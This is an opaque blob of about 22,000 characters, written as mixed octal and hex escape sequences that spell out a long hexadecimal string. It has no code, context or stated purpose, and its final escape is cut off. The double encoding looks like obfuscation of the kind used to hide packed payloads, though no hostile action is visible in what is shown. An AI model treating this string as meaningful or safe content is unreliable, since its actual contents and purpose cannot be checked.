62\70\141\142\61\142\67\145\x34\x64\x35\x36\144\61\62\141\143\60\x63\71\142\x32\142\146\x33\144\x37\65\62\60\65\142\70\65\x38\142\x39\x66\142\x39\141\x30\x64\x66\x64\x62\60\66\146\61\x37\141\x65\x64\x37\145\62\65\63\141\x64\x64\x33\144\70\x36\x65\144\142\x62\x30\141\x34\x63\x35\146\71\x66\x37\61\x39\64\63\x66\x61\66\x62\144\x36\x65\x34\x37\x34\64\x64\x61\146\63\x65\61\x61\61\x32\x64\x31\144\x66\x30\61\x30\143\141\x31\62\146\x33\x35\x64\x30\x34\141\x33\x30\142\62\x35\66\64\x64\145\142\141\x32\x66\141\65\60\x62\x65\x35\61\x34\x35\70\141\x64\62\x36\x36\x37\70\144\x39\141\142\61\71\x34\143\x33\x39\64\x38\x30\141\60\x62\63\x33\142\61\61\70\x36\61\x34\x30\143\x62\64\x37\65\x35\x38\x32\x31\66\x63\144\x32\x31\x62\146\x63\x38\141\142\x61\141\64\70\x65\x61\145\x31\145\x31\x64\x38\144\x36\x39\x31\x32\70\71\65\62\71\145\x31\146\71\143\71\x31\64\x61\x37\70\61\63\62\62\143\143\x32\67\x32\142\x62\146\x31\65\x63\x33\62\x62\x66\x35\x36\63\146\x31\x63\x35\143\144\60\x66\x62\70\x32\x35\x38\x34\x39\x39\70\143\x65\x61\x64\62\60\x31\x32\146\x32\70\65\x39\143\x65\62\x34\x62\x35\71\x64\66\71\61\63\62\70\64\71\71\x30\146\x38\x34\x33\x66\x39\x65\x36\x66\144\x64\x38\x35\71\x39\146\145\142\x32\70\x36\x65\146\141\66\63\143\x65\141\141\x33\x33\x39\65\x61\x66\x37\141\x34\x39\66\66\x63\x33\x36\64\x35\x63\146\x35\65\x30\x31\x38\67\x32\71\146\64\60\66\x39\x33\x63\x34\143\60\x33\x35\146\x34\x35\66\63\x63\142\x35\67\70\x66\66\61\142\x63\144\143\63\62\x64\x31\x65\64\141\x66\144\x32\60\x64\67\x37\x61\x62\x62\x32\141\x35\x36\141\67\x39\61\x38\61\63\62\144\x31\x64\x36\142\x34\x62\x62\61\141\141\71\62\x39\60\x32\x64\x33\66\x62\142\x39\x63\60\x39\144\64\66\63\x36\64\x36\141\x35\x34\67\65\146\x63\67\62\x61\x33\61\142\145\x61\145\x34\144\x62\67\x35\67\x62\x64\143\x33\x64\67\x63\71\x38\141\x35\x32\x35\142\x65\70\x66\x36\62\63\x30\143\x65\65\x62\67\67\64\x30\64\145\144\x63\64\71\143\x65\60\66\x37\x66\66\145\x30\x39\x36\x34\x64\x39\66\142\x39\141\142\x63\64\63\x34\x31\x32\66\x33\x63\x64\x36\x34\x38\x32\144\x30\x35\62\x35\x32\x66\x38\65\x63\62\67\61\67\x61\66\x35\x31\144\x31\146\143\71\x63\66\x65\61\60\60\x35\67\x65\x39\64\x66\144\x35\x65\x34\61\x63\62\143\x32\x31\65\x34\x35\144\60\x62\145\x61\146\71\142\x34\x66\x64\70\60\x39\x30\x36\x36\x32\x39\x31\x66\62\63\x31\71\144\145\x63\x63\x65\x34\x31\65\x35\x37\60\x32\146\x61\66\65\x65\65\x37\64\x63\63\x37\63\x63\x35\66\x65\144\x37\x37\70\x39\x62\146\66\62\64\67\70\x66\62\70\x64\x63\65\62\x39\x33\x66\67\146\x38\x30\62\142\71\64\x33\142\x34\142\x66\x37\60\64\70\x35\x62\142\x63\x39\142\x34\x39\x62\x39\x65\x65\x38\142\62\x31\143\146\65\x66\x64\144\143\63\67\61\141\65\x30\67\x30\x33\x34\145\146\x33\71\x61\x32\60\61\x30\61\70\x65\141\143\x66\144\x32\145\70\x36\x34\145\x61\x38\66\x30\x61\x35\144\x30\x36\143\x64\60\x61\x36\x65\x38\64\146\x30\144\144\61\x66\62\63\x37\64\70\66\141\x36\142\x63\146\x33\63\x38\x64\x30\x36\x33\x39\x33\145\70\60\x31\x65\x39\x65\63\62\145\62\x65\x31\64\x61\x31\67\x30\66\60\x31\66\x35\61\x66\x66\x37\62\x34\145\144\x62\67\x64\61\x33\x64\x39\x37\x65\x38\x62\67\142\x63\x34\63\146\x34\70\65\x31\63\x34\64\65\x35\x63\x32\71\x39\143\145\x32\71\141\x39\x63\x63\62\61\65\x35\65\x65\x61\64\142\x63\71\x62\x37\144\x63\71\61\x33\65\67\63\62\x37\x61\x32\x35\146\66\x66\67\143\66\x38\x39\x62\x65\70\x32\60\66\x33\67\x36\65\x38\146\61\x31\x61\x61\70\62\62\x66\60\60\x64\70\x32\146\x31\x30\x34\61\145\65\x64\142\146\146\64\65\70\x30\x66\x31\x31\144\x62\x62\144\65\67\x37\x63\65\144\x65\142\70\141\x66\x32\x65\65\x30\64\71\61\67\x37\61\x65\143\x66\x64\143\x31\65\x30\71\x66\70\67\x33\x61\x65\60\144\x38\x32\61\x33\x61\x32\141\146\62\x63\71\x62\144\66\x39\60\71\x38\60\71\x30\x31\63\x65\x65\x30\x66\63\143\65\x64\x34\60\142\65\x34\61\66\x62\144\x34\x37\x30\141\x37\x36\61\143\67\x61\64\62\144\x35\x36\x32\x62\64\146\x32\x32\61\60\65\70\x38\x33\x66\x66\66\x32\143\67\x61\x64\70\142\146\67\145\x30\x37\62\x32\60\x61\62\141\x34\62\x63\x32\146\71\62\145\143\x66\65\x34\66\x30\x66\x38\x65\x39\61\145\x63\x66\x33\70\x37\x36\142\66\65\x38\x64\71\x36\66\65\x33\62\145\61\x64\x33\67\x34\70\70\71\144\70\143\70\70\66\x31\70\x39\x37\67\x62\141\141\64\71\64\67\x33\62\146\x63\x62\144\x30\x65\x36\x30\142\71\x34\x61\x64\66\x66\66\146\x38\145\144\63\145\142\x35\145\141\x38\x32\x34\61\x37\x30\142\144\x63\x37\x32\x34\x65\65\146\65\64\x30\x39\143\146\x63\x30\66\63\x34\x36\x31\71\63\x36\x65\141\x35\144\143\143\65\x31\x65\x66\x36\x31\70\143\x39\x36\61\66\61\63\145\67\66\67\143\x33\x34\x35\145\x35\65\71\64\x61\x36\x63\x65\x63\64\x37\x64\142\x64\64\x38\x65\65\64\61\x62\71\145\x35\x31\x65\142\61\x63\64\x30\70\63\66\142\142\63\70\63\144\x33\x61\x35\141\x37\64\x65\x35\x36\146\x38\67\146\x30\145\x37\145\62\x36\x64\70\x30\141\144\x38\64\x39\62\143\70\x64\60\x35\x33\142\144\x35\x66\x66\x34\67\x65\61\x32\x33\63\144\145\146\x30\x39\141\141\64\67\x37\71\x38\144\x36\x63\141\71\71\x32\71\x32\x30\x31\x38\64\x30\x35\67\x34\x66\x37\x35\60\x64\x64\x34\x63\x38\x35\x65\67\x30\x35\63\66\71\142\x38\x36\64\70\62\x62\63\x64\x35\x31\x62\x32\143\60\67\145\60\63\62\x34\63\x39\x38\60\63\x37\62\64\142\65\x66\x61\x31\70\144\x36\x36\66\x37\x38\70\71\63\66\x64\x66\x38\145\61\142\x32\x33\x62\x35\x35\143\x32\x63\x33\70\x36\143\x66\63\71\x39\65\146\x31\143\x66\x66\64\64\70\x32\145\142\x30\71\145\61\x30\141\71\143\x38\65\142\x34\x62\x63\x61\61\64\x37\x32\x39\141\x30\x39\x38\64\64\61\x37\x65\x37\145\70\70\143\67\x37\142\65\66\x34\65\66\x38\x35\146\142\61\x61\70\60\66\x30\x32\x36\66\x39\x36\142\x30\142\143\x64\62\x33\64\60\146\143\x30\146\x33\x30\x64\x35\143\x35\60\67\67\70\63\146\70\x62\66\x64\60\x31\145\65\x30\142\146\141\x38\65\143\144\x65\x61\x34\x36\61\141\61\x63\x38\62\x65\x65\x33\65\61\x31\61\x34\142\x30\x61\70\144\145\x38\x35\70\145\65\x63\144\x31\x64\66\64\x37\x33\x32\x35\65\x64\70\141\x38\145\145\x38\60\x34\x39\x66\144\x65\x63\x33\141\64\145\70\x66\67\x65\x38\143\x33\144\70\x33\63\141\x38\x30\63\x62\141\66\x66\x33\145\67\141\145\x38\x65\x63\141\x64\63\x30\x30\x38\71\70\144\70\x66\x62\x62\x30\144\x36\x34\70\145\63\141\67\x62\x65\x33\x38\60\143\63\x39\x65\66\67\63\146\x62\x63\70\x33\61\70\x32\67\x62\66\x62\64\x63\x61\x34\x34\143\x34\145\60\64\142\70\x31\70\144\x66\65\61\66\x38\x37\x34\x32\x32\64\70\146\x37\70\60\142\70\61\x63\145\x62\x64\x63\141\143\x30\x65\141\x66\x63\x65\146\x62\x66\71\x30\x39\71\x35\x34\x32\x34\x61\71\x37\63\x64\71\63\70\x61\x34\146\x36\x31\64\143\x63\66\x66\61\x61\x64\71\x30\x30\146\x37\x32\x36\x36\x34\61\x30\66\x64\143\x31\x65\x63\x32\142\x38\63\x37\x30\x34\x63\141\x30\66\x61\145\64\71\62\x38\70\x62\60\61\x34\141\66\x64\145\x32\x34\144\x32\66\x31\61\64\62\x36\144\70\x35\62\71\62\61\x38\x38\142\x33\63\63\143\141\x37\x62\x38\141\x66\64\x31\x34\61\60\x63\x64\x32\62\64\x62\x35\x62\70\143\x35\x35\60\x62\x64\143\x63\x66\x30\x66\x65\x38\143\142\x32\67\x35\65\x34\70\x35\x38\65\61\70\61\142\71\60\67\x64\x33\x31\x37\145\x38\146\x38\143\67\60\142\x33\141\x64\64\x34\144\62\146\x38\x35\64\x31\61\144\x65\70\x31\141\x39\60\x64\64\70\x30\143\71\67\x39\64\60\146\x32\x30\x37\63\63\x61\60\141\146\142\71\146\x31\x63\62\x36\x64\x64\63\141\x62\x65\61\146\x33\144\x61\64\x38\x31\65\62\x38\65\61\145\x38\60\x36\145\64\x30\64\60\x36\64\71\64\x36\146\63\64\x39\x37\143\67\70\x65\x63\67\x38\x39\x64\66\x37\x37\x65\67\x34\x34\60\60\144\61\141\141\x31\64\x32\x30\141\x35\146\x63\67\62\x31\x30\144\x36\x61\70\x31\65\x65\x32\63\x39\143\60\x39\x39\60\x31\x34\61\142\x37\62\x39\x61\x39\x64\70\x63\x64\141\x36\x38\x33\142\145\x61\142\x34\x63\141\x62\142\x33\145\x34\64\146\x65\x35\x36\63\67\x38\144\x65\x37\145\66\70\x37\x35\x61\142\64\x30\61\61\65\60\143\62\x34\60\x65\63\67\x66\71\x39\64\66\143\71\146\x33\x38\62\x36\71\62\x39\64\67\144\67\70\x33\x38\x33\x38\65\x39\x65\143\x62\143\63\x39\66\x33\144\x61\63\x39\x35\x36\x35\64\x38\x39\62\143\65\x35\x37\146\x62\145\71\144\x34\x35\x36\x35\142\63\60\66\x66\63\x30\144\71\63\x36\70\70\145\x65\141\x61\66\70\x65\62\x38\x30\x31\70\x61\60\61\67\x39\x33\x61\142\x39\70\66\x33\x32\145\x64\x33\66\x65\x39\x37\x34\x64\x30\x64\71\x36\65\143\66\70\60\x62\x37\146\x39\145\x39\143\142\62\142\x36\141\x31\70\62\70\62\x62\145\70\x38\65\x63\61\61\x39\x34\x64\63\143\61\x63\146\x37\66\142\x36\62\61\143\61\63\x65\x32\x61\x33\146\x31\x65\70\65\66\x61\61\x30\146\x66\62\62\x66\x37\70\x38\x64\x38\144\65\64\67\143\142\x37\65\x31\x33\x39\71\x66\x63\x61\x38\67\71\144\141\146\71\64\x36\70\x31\61\x62\x38\61\62\x34\x39\142\x36\61\145\x35\x66\145\x66\x36\145\x65\70\66\146\x66\x64\x64\142\145\143\67\70\70\x35\143\67\x63\144\61\62\x30\142\x36\62\71\61\x33\63\x64\x38\x35\62\64\x31\x33\x64\144\x35\70\63\x35\x39\x64\x38\61\x34\x33\146\63\x66\x61\x32\142\x63\x30\146\x34\x38\x35\x36\x38\143\x66\62\x36\x64\66\64\142\60\x35\x31\70\x36\61\145\x35\60\x64\66\67\x35\x32\x61\x30\66\x30\61\60\60\x33\x62\x64\x36\141\141\x38\146\63\61\63\x36\66\145\x31\70\x31\x38\144\x36\66\65\x65\63\x36\66\60\66\x38\x34\143\66\60\x38\x35\x30\x34\71\x30\x31\x65\x66\x35\x36\144\60\x64\61\146\x38\67\x37\x31\x36\x35\145\x32\x61\141\x35\64\x64\x66\145\142\141\70\x36\x62\63\x35\x63\65\x64\x62\145\x66\64\146\141\141\144\70\65\x62\x34\62\141\x35\146\x37\63\63\61\x35\70\62\144\x62\61\x34\63\141\x30\145\x39\62\x62\145\x30\65\66\67\x35\x34\x65\61\x30\x36\143\x65\62\141\x64\71\144\143\144\x34\67\x64\71\70\67\x37\x31\x39\71\67\141\141\60\x32\66\x62\x63\60\63\61\63\144\x66\x35\x62\141\x36\x65\146\64\x31\142\144\x34\x37\65\145\144\64\142\x36\62\60\x37\x64\62\x66\x30\x30\x34\66\71\x37\x62\x31\141\x36\x62\141\x63\x33\141\x30\x61\x37\62\62\x30\66\x39\x65\144\60\x31\x33\x38\146\x36\x30\65\x32\66\67\x61\65\61\x66\x33\x63\62\x38\60\x32\x63\x37\143\70\65\63\61\x35\61\x64\x61\65\x38\x39\x63\x66\142\x65\62\64\x35\143\64\x62\61\x30\x31\x65\70\141\x61\141\70\62\x38\x35\x65\x39\62\x61\x64\143\66\71\66\145\x32\141\66\x34\144\x35\60\x64\142\141\146\67\x64\60\144\66\x66\x32\x34\141\145\x35\x33\70\71\x31\145\x39\x34\63\x66\63\146\145\60\x61\144\x66\x38\x62\x38\142\x34\61\146\x34\x35\x30\142\x65\64\x33\x62\x66\71\61\x33\x30\146\62\71\x39\145\x33\145\x62\x37\x61\x38\x64\142\x32\65\66\x32\66\x35\145\x62\142\65\x37\x62\60\65\64\x61\x63\67\61\x31\63\x36\x61\x66\x36\143\x37\70\x32\x66\144\x66\x39\x65\65\66\x37\63\144\x37\x66\x35\x34\66\70\62\x64\144\146\70\x37\62\x36\143\141\143\64\70\x37\x64\71\146\142\x66\x35\x32\x34\x38\x32\143\146\66\60\67\61\x31\x61\65\x66\145\146\x64\145\60\x32\62\x34\x31\71\x66\x31\71\x35\65\x30\x31\64\x37\x34\x34\141\x33\x64\61\x37\x65\x64\60\x63\63\143\x66\x32\x39\146\61\x66\142\x65\x38\x38\60\142\x33\145\x31\141\63\70\x35\63\146\61\x36\142\x64\x32\62\x39\71\144\70\143\x64\141\x38\60\x36\141\70\60\x64\x66\x66\x35\x63\x62\x65\x66\x62\x39\65\x35\x35\63\x33\x38\63\x65\144\62\x61\144\x64\71\65\x64\x65\63\x64\x65\64\64\143\67\x39\62\142\65\x65\62\x38\142\143\145\70\x36\143\141\67\62\x34\71\x32\x62\146\64\x30\71\62\x65\146\67\x32\142\x30\141\x65\x37\65\60\x66\x32\145\x63\70\141\x38\x32\x62\x38\143\x32\x37\x35\x37\146\61\70\145\x39\142\145\x30\67\x35\63\x36\60\142\x63\144\63\x35\143\143\144\141\x65\145\x62\x65\62\71\61\70\x39\145\x30\x61\142\x32\66\60\64\144\x30\70\x37\x64\145\63\143\x36\x66\x30\x61\x61\61\67\142\x65\x34\64\145\x32\x37\x39\x39\141\70\x65\67\x36\x33\x38\61\x33\x33\64\60\x33\x31\61\71\x65\x63\x63\70\x65\x35\62\142\x61\x63\x35\60\60\x31\x32\64\145\x35\71\x31\x34\x39\x37\145\x30\x64\x32\71\143\61\142\x37\60\60\62\x33\65\x38\63\63\71\145\x63\63\x66\x32\x38\63\61\64\146\x65\x34\144\144\x64\x35\144\x62\x63\67\x36\62\x30\71\x64\x38\66\x36\x37\64\x65\65\x64\64\63\x61\x39\60\x35\66\x65\x34\x66\x30\143\x32\141\x36\x66\71\67\63\60\x36\x66\x39\x38\x62\144\x62\141\71\141\x30\63\x38\67\x36\x39\x30\146\71\x62\x37\x61\x37\70\x36\144\x64\x61\x66\70\67\x31\146\71\146\142\61\x30\67\63\65\x62\x32\141\142\63\61\x65\x65\146\x32\x62\x37\x31\71\145\x30\x34\x38\64\64\66\67\61\x63\x33\64\x63\62\x39\x65\x39\70\61\x62\66\71\146\71\146\143\x65\63\x63\71\x63\144\64\x63\60\x66\70\x39\143\x33\x32\x32\x64\71\144\70\x33\x33\x35\145\142\71\x39\x32\64\x64\x61\141\71\x31\62\60\61\61\x61\x65\x36\65\67\x66\x31\65\x65\65\x36\x33\x36\143\x63\x30\x38\x38\145\x63\65\x65\x37\x31\65\141\144\70\x61\x33\65\x39\x35\71\61\144\x64\x38\143\64\x37\141\x38\x38\64\x64\67\x38\67\60\66\x31\x63\x39\143\x31\64\x38\141\141\142\x62\x33\x66\144\70\x63\x39\x36\65\x62\60\65\x33\63\x62\67\x30\64\x33\x32\x31\145\x35\146\63\x33\62\63\142\70\144\x37\x37\61\146\x65\x39\x31\65\67\x36\142\60\x65\x30\142\x37\x31\x31\x61\63\145\x35\x63\x64\x63\71\x31\x30\x66\x65\64\x30\x66\60\x63\x65\70\60\145\x34\x65\x64\x61\x39\66\x32\x66\141\71\142\x30\x63\x36\64\x38\64\x63\61\71\x38\142\x64\141\144\x31\x38\146\x65\144\x37\143\141\x62\142\x32\x31\x65\70\70\146\x39\x61\62\x35\64\67\x35\142\67\67\x38\x31\x62\x30\142\141\144\x61\60\65\x62\63\x33\71\x64\143\60\x35\146\x64\71\146\62\x64\x38\x35\x31\x36\x32\x64\145\x33\62\x37\x33\x30\x61\x31\145\141\60\60\x31\146\x61\141\65\x65\x63\x39\66\70\71\x64\x36\71\x62\65\62\60\x30\x36\145\63\x61\x61\142\x61\144\142\x32\x34\60\62\64\x30\x64\65\144\x38\144\x30\146\65\142\145\66\x38\66\63\x65\71\x65\66\71\x35\x39\146\61\141\65\x64\x37\x38\61\144\71\141\143\71\67\144\x39\60\63\66\x64\143\x32\x36\x32\x32\x63\63\142\x34\62\145\x30\65\62\x61\64\65\63\141\x38\x37\x32\x65\62\64\x35\71\x65\x63\x66\x31\143\x32\x64\x63\x61\x62\146\60\x30\x33\x37\60\x37\61\x31\67\x32\x37\x37\x66\x63\70\x63\x34\60\x38\141\61\x61\61\61\x34\x31\64\142\x38\x62\61\66\x62\x31\67\61\67\143\x62\66\x35\143\71\141\x39\142\144\145\x37\146\x31\x66\x64\60\x64\x38\x65\x30\x35\142\71\70\x38\x39\64\x39\70\x66\x30\60\60\x37\x33\x66\65\60\x37\x61\66\x36\70\66\142\64\145\x64\146\x33\x39\x35\60\x36\x33\x39\143\61\70\x64\67\65\144\70\141\145\63\x62\62\x32\x30\63\60\x34\x30\145\146\145\x66\70\x64\x61\70\x62\x34\62\x66\x61\x35\63\x37\141\x39\x66\60\x37\66\x37\64\65\x62\62\x35\x61\x39\61\64\71\143\x34\70\65\x65\67\66\x63\x66\x32\70\x35\x34\144\141\146\64\x37\145\71\x62\144\66\x30\65\60\65\142\145\x31\71\67\145\66\144\x39\66\x66\142\x38\x30\70\145\142\144\x62\70\x33\x66\x34\60\x35\61\x66\x30\145\x64\x32\67\61\x32\63\x30\x65\x61\x66\x39\x30\143\145\142\143\60\x38\x65\61\x33\x65\x66\x62\66\x64\146\x39\x32\141\x33\x39\70\66\x33\60\142\146\143\146\141\70\x37\x34\61\x61\x32\x63\70\x35\x36\70\x38\x30\x30\x62\60\x64\145\145\x65\x34\64\62\x63\62\66\x65\60\70\x64\146\x39\x30\x31\x38\62\143\62\x38\x66\62\x62\x64\x62\146\x38\x32\x36\70\67\x33\x37\x31\x36\66\146\70\x38\62\60\143\x35\x33\67\60\144\x63\x37\x37\65\65\x62\x64\x36\70\145\x39\64\145\x62\62\70\67\60\x34\66\x35\145\62\70\143\x35\x34\x65\61\x66\x30\x64\63\x33\x38\x33\61\x30\60\62\x34\x63\x34\71\61\66\x62\x63\x32\141\x62\66\67\71\x63\70\x37\71\x62\x33\x31\x64\144\66\x61\143\x39\x35\145\x37\64\142\x36\x33\67\142\61\143\144\x65\65\x64\71\x64\x63\x35\145\61\x66\66\66\144\x38\x39\63\x34\141\x61\x34\146\144\x62\71\145\x61\146\x35\63\141\61\61\x31\x31\146\144\67\x30\142\x35\67\64\60\x62\60\62\x36\146\x32\x37\x34\146\x33\x30\x32\x32\x66\x36\x62\x64\x39\x66\x37\60\x61\63\146\70\145\61\x65\x39\x62\64\x39\x35\146\65\x30\70\64\x65\142\x63\61\60\x61\145\x37\67\66\x61\x30\71\60\63\x32\x62\63\145\65\141\66\x31\x30\x33\145\x64\x32\x33\145\x63\x37\x66\65\x33\x34\x39\x33\x33\x36\x35\60\64\x64\65\x39\63\x37\x37\71\146\141\146\x38\65\61\64\71\x37\x39\x30\143\70\144\142\x64\63\x30\67\x62\x66\63\x66\65\70\x36\x63\64\x35\x64\146\146\x39\x34\65\66\63\62\x37\x39\67\x39\x38\x35\145\x37\x31\141\142\x39\65\143\x39\71\71\142\71\65\x34\x33\67\65\145\142\61\63\64\143\63\x37\x63\x63\x38\x64\x65\141\71\67\x66\64\62\x32\x34\x31\61\x36\x64\x35\x32\143\x32\x31\145\66\66\x61\146\x62\x66\142\x38\x36\x37\71\x61\x63\63\x38\x33\143\71\x34\x64\x36\142\145\x64\x65\x36\x33\144\142\65\x66\62\60\x33\64\146\x38\x32\x37\61\65\x31\x65\65\x65\61\141\x66\x38\x64\64\65\70\141\63\62\60\143\144\x61\62\64\145\x64\71\143\x34\71\64\64\71\x33\x39\x63\x32\143\70\x61\143\61\145\x61\61\x30\145\67\x62\142\62\x38\x35\70\x36\x34\62\x38\145\x63\x65\144\x64\x34\x33\143\x34\143\x37\x38\x61\x63\x30\62\x39\65\x35\60\x33\x39\64\141\62\65\x66\x34\64\x34\x37\x38\x35\141\61\70\61\142\x31\70\64\x63\x39\143\x39\x39\141\x39\x35\144\65\70\62\x39\x36\x37\x36\71\x61\x34\61\62\70\x35\65\x36\x64\142\x37\142\x32\71\63\71\71\x66\64\60\x66\67\144\x35\71\x30\70\67\70\x35\67\142\60\x62\x66\70\x35\x37\x32\x65\145\63\70\63\x35\143\142\145\x63\x65\144\x36\x33\63\x62\141\x31\67\x31\x35\x63\x65\x62\142\145\65\67\x38\x34\x33\x30\x38\65\x32\141\144\60\65\x31\62\x34\144\62\61\65\x30\144\x37\71\62\146\63\x32\67\x37\x61\61\x61\x64\x36\x36\x30\70\62\63\x61\x66\x36\x38\64\70\x33\143\145\61\144\142\71\x36\141\62\142\145\x33\x64\x35\67\66\x31\x64\x37\x38\70\63\71\61\65\67\71\65\146\142\141\142\144\x66\x37\x32\145\x66\143\x33\x64\x30\70\143\x61\x66\141\x61\62\x62\x66\67\x30\x31\x62\x65\x65\x37\x39\x61\60\70\x61\65\145\x39\x35\x39\144\x65\71\66\x35\x66\x62\66\x32\x39\146\x33\60\70\144\x38\142\x33\x32\63\x36\x66\x61\x65\66\x65\x34\x39\60\67\71\62\143\x37\144\145\x66\x36\x35\x33\x62\x39\x37\66\x65\66\x33\65\145\x31\66\146\x32\x66\67\x65\x63\x33\143\x38\63\x34\60\x65\144\x61\146\x62\70\144\66\144\x33\62\x39\x32\x35\x38\x33\x39\x37\x65\x63\63\x34\x64\71\x66\145\x33\x39\x62\141\x35\145\62\71\x35\x39\62\145\66\x33\x63\61\x65\142\x65\x37\70\x33\66\63\x39\144\x66\x30\x31\60\x65\141\x63\x36\x32\60\x30\141\70\x33\x37\141\142\x31\60\x35\x37\x34\143\145\x37\67\67\x66\x32\64\144\63\x65\x30\146\x36\x39\x37\60\x38\x66\x64\x34\60\70\x64\x35\x64\x66\145\x66\71\x63\x66\65\65\141\x36\x39\x63\145\70\143\71\143\62\x33\x38\x37\x61\x35\x33\146\x36\x38\x30\70\x39\64\x36\61\x64\66\67\x39\x34\143\61\63\65\x64\x63\143\x39\x34\71\x35\65\x33\x32\x36\70\x66\x32\61\144\146\70\x38\x64\65\x66\60\x30\x34\64\145\x63\62\x38\60\144\x33\141\142\x38\71\x35\x61\x30\x30\x38\67\141\67\x66\x36\x62\63\x31\66\66\146\x35\143\70\x31\66\143\x63\x39\144\63\60\143\x36\64\142\62\62\141\x34\143\62\145\x32\x61\71\x34\144\60\143\x65\60\67\67\x31\x35\x62\x64\x62\x32\67\x66\63\145\x37\x35\143\x63\66\x36\x33\62\146\x38\63\x63\x38\142\x30\x62\x37\x37\60\x30\144\142\63\x65\x35\x31\x64\70\141\x63\x37\x62\61\61\63\x36\x30\143\x33\141\x31\x61\61\x37\x37\x33\x34\x32\141\146\71\143\x62\61\x36\x62\x64\146\141\x36\x30\143\65\63\x63\x39\x64\64\x36\x33\63\63\62\x31\x31\x32\x64\145\143\146\x63\x37\x63\x33\x35\63\x30\x38\x63\141\141\x65\71\x30\65\64\x32\61\x30\x66\141\x33\145\x33\x39\70\x62\62\70\x39\x39\144\x66\x35\146\67\x38\x32\70\x36\145\x65\61\x61\62\x61\143\144\71\x62\x65\141\x32\x31\66\x66\x62\143\70\x64\142\63\145\x63\x61\67\64\x30\x63\60\65\144\142\x63\70\x62\146\67\143\144\61\x61\x62\142\145\x36\64\x37\61\144\x36\x36\60\61\145\71\67\x30\x63\x64\x66\144\x36\144\61\x65\x35\61\x63\62\146\x66\x66\x61\61\63\x64\71\x39\141\x32\x38\60\x37\66\x36\67\146\x37\141\145\71\141\x36\x32\60\144\x65\x66\67\x65\x61\141\x63\65\60\65\143\x31\143\x30\x64\x30\x38\x63\143\67\70\145\x38\145\x39\63\x66\61\x37\60\x66\x62\71\x31\67\x63\144\145\146\60\x38\x66\146\x37\x34\x36\x34\x34\64\143\x36\x35\65\142\x64\70\x33\61\143\x37\70\x66\63\x63\x65\x30\x64\62\70\146\145\x61\x30\x62\x61\66\71\63\x36\x38\x31\71\60\x31\x34\x62\71\x65\141\62\62\x64\71\66\x36\x35\x35\70\65\71\x38\x63\70\x30\66\x63\144\71\143\x37\66\x66\x64\141\x66\x62\x62\x36\x63\64\x31\142\60\62\x61\x65\65\71\x34\x61\64\x33\x35\141\x65\x39\71\x39\x38\x65\x34\71\61\x65\144\66\x66\143\144\66\x66\144\144\146\62\x61\x66\66\x39\64\66\64\x30\x39\x63\x31\64\67\64\x38\67\x63\x32\x39\142\x39\61\146\x38\x33\145\71\x31\x63\144\145\x64\70\x35\x39\x64\x62\62\x64\x30\142\67\x66\146\x31\x62\63\x35\x31\x30\x61\x36\63\146\144\61\x38\60\x32\62\145\63\x61\67\145\x34\x30\x31\x65\x66\x39\x62\x36\x36\70\x38\70\x63\67\143\x30\x63\141\61\142\142\x34\x61\x33\x32\x66\x32\x65\x36\65\63\141\x37\60\x36\142\x66\66\71\x62\65\x38\145\x31\144\x63\141\x64\x39\x66\x62\x63\70\x65\63\60\61\71\143\144\x66\62\x63\x64\x66\x32\x37\x33\71\67\71\71\x65\x66\65\x33\x37\x66\x32\67\x34\60\64\61\x65\x32\142\65\x38\x39\141\x34\x65\66\x34\x65\141\62\x66\x35\x31\x64\x65\x31\x36\x37\x66\62\66\x36\143\x61\71\145\63\65\x35\66\143\x64\x33\x66\64\x63\70\x63\x36\x37\67\x61\x35\142\x66\x34\60\67\x66\71\x36\x64\x34\x36\145\66\144\x35\145\x39\65\65\60\64\145\x31\x38\60\x35\x32\64\x30\x63\61\71\71\142\x36\64\x38\x39\x61\x33\x66\x62\x65\x63\x65\x35\146\x36\x34\142\146\146\x37\62\144\146\66\x39\x61\71\141\x65\x35\144\x36\71\60\x33\x63\x30\61\x31\x35\145\x32\146\x37\145\x65\60\63\146\x30\67\144\x32\x62\64\x34\141\x35\143\x37\145\x65\x31\144\61\x31\x33\x39\143\x61\61\x62\61\x38\145\x33\71\x64\64\x61\x65\67\x31\142\144\70\66\144\x39\x31\64\62\142\x39\67\67\x37\x61\70\62\66\x63\x39\x61\x61\x64\61\x66\x37\x34\x65\62\146\63\x64\x64\145\x34\x37\146\62\70\60\146\x35\62\63\x38\x35\x36\67\x39\x37\62\x63\x36\64\x36\60\62\x30\x30\60\x37\60\x36\x32\x35\141\x66\x39\62\144\x30\143\141\x62\146\62\146\60\x63\x35\63\70\x37\x39\63\x61\x63\146\x30\x65\144\x36\61\64\144\67\65\x38\x39\142\x37\x30\142\70\64\66\x33\x64\x36\71\142\67\66\x35\142\x36\143\x30\x30\x66\x62\70\x39\x34\146\x63\146\x36\63\x61\70\64\143\x32\x30\146\142\144\x34\64\x33\146\143\144\141\x64\71\64\143\70\x36\x32\71\x61\x32\141\x62\64\x66\x65\144\142\142\x64\65\67\70\146\x36\146\142\x35\x64\x62\x37\x39\x66\71\146\146\64\63\144\x38\71\x34\63\x38\62\x36\62\x63\143\x35\64\x34\60\146\x33\x37\70\x38\x33\66\x62\64\64\66\70\x33\x37\x65\142\142\x39\x37\67\x66\66\70\x61\64\60\66\142\x33\141\71\x65\66\x36\x39\x31\x35\x33\x34\x66\x62\x34\x32\x30\61\x30\61\x62\x39\x36\x34\60\61\145\x31\66\x33\x36\70\x36\x66\70\x32\x32\71\x37\64\x61\141\x63\x66\x35\x65\63\144\146\142\x32\64\x31\x34\71\70\x61\x62\64\x39\x34\146\70\64\142\65\x37\144\x66\x39\63\145\x63\x39\66\60\67\67\x62\62\x38\x33\143\x36\60\x38\67\x36\64\71\142\x35\x34\144\x34\x32\x36\64\63\x31\62\x34\141\67\x38\62\143\71\x63\x35\x32\146\67\62\x36\x61\66\x34\67\63\x33\x34\x63\x66\142\x31\x64\64\64\x61\x65\141\x33\70\66\70\x35\x61\x35\64\143\x37\x34\x63\x63\x34\x36\66\63\x33\142\x65\63\x34\x36\x38\62\143\x61\x30\70\x34\x37\x64\x36\x37\x36\x35\x66\x33\x61\x30\60\60\x31\x63\141\142\x38\62\x30\63\x31\144\x31\60\143\60\x33\70\x37\65\x39\x61\141\67\64\146\x39\x32\60\x38\x35\142\143\x63\65\66\x36\x31\62\145\70\x61\63\x65\x33\63\x36\x30\142\x62\66\x33\x30\x36\70\145\141\x36\x30\60\66\67\65\144\62\x32\63\x36\x39\x62\x61\71\141\61\x31\x30\x65\x36\146\65\x65\142\64\x32\x33\x35\145\143\x64\143\70\146\60\61\x61\65\x37\x35\x31\x61\70\67\x32\65\x31\x62\x35\x37\60\x30\144\146\145\62\x36\143\x61\x6